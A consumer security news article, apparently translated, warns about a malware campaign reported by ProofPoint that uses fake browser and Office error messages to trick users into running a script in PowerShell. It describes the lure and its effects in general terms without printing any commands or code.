Threats, viruses and infections continue to spread and a new attack campaign is putting users in trouble. The main reason for its severity is that it pretends to be error messages from some of the most well-known services and programs to trick you into activating a process that will cause you to become infected with malware.
As mentioned by ProofPoint, which is the one who has raised the alarm about these threats, there are several ways in which this campaign is spreading. This increases the risk, given that the hackers behind the infection have looked for different ways to bring it to users and thus put them at greater risk.
This is how the virus works
The only good news about this new malware campaign is that the process for us to put ourselves at risk does not seem to be very simple. From what we read, the infection is complex and it is likely that a large number of users will not fall for it. In any case, ProofPoint says that the infection process is so realistic that everything seems so real that, no matter how complicated it is, there will be many people who end up falling into the trap.
The process in question begins when the user ends up on one of the infected pages using Google Chrome or finds it in a file opened with OneDrive or Word. The infection displays a very convincing error message on the screen stating “Something has gone wrong displaying this page.” It then indicates that some type of error has occurred and that, to solve it, the user must carry out five steps detailed below in the image.
You can also copy the solution or refresh the page. As you can see in the image shared by the ProofPoint team, users have to log into Windows PowerShell with administrator permissions. There, a script is executed with various payloads prepared by hackers with the intention of infecting the user’s device. This includes deleting the DNS cache, deleting the contents of the clipboard, and running an additional script that carries out the next step of the infection.
Different versions and another threat
The specialists who have reported on this infection say that there is not only one web message design that appears on the screen within this context, but that they have found several versions. In general, they all act in the same way: trying to get the user to execute a PowerShell code that will lead to the computer being infected and all the problems that follow.
But they also mention that this malware attack is also being deployed through emails with attached messages in HTML format. What happens when the user tries to open the file in question is that an error message appears indicating that it is necessary to install a Word Online extension to be able to view the document. At that point, the user ends up being taken to the same destination: PowerShell, where they have to copy and paste the code in question that loads and executes the threat.
As security experts who have analyzed the problem explain, attackers are taking advantage of two different weaknesses. The first of them is that Windows does not have any type of detector to know that the code copied to the clipboard is malicious, which, if implemented, could help avoid many problems. The second weakness is on the part of the user, since special emphasis is placed on the fact that many people are not aware of the problems and risks that executing commands in PowerShell can entail. In this situation, it is better to keep your eyes wide open and avoid possible problems.
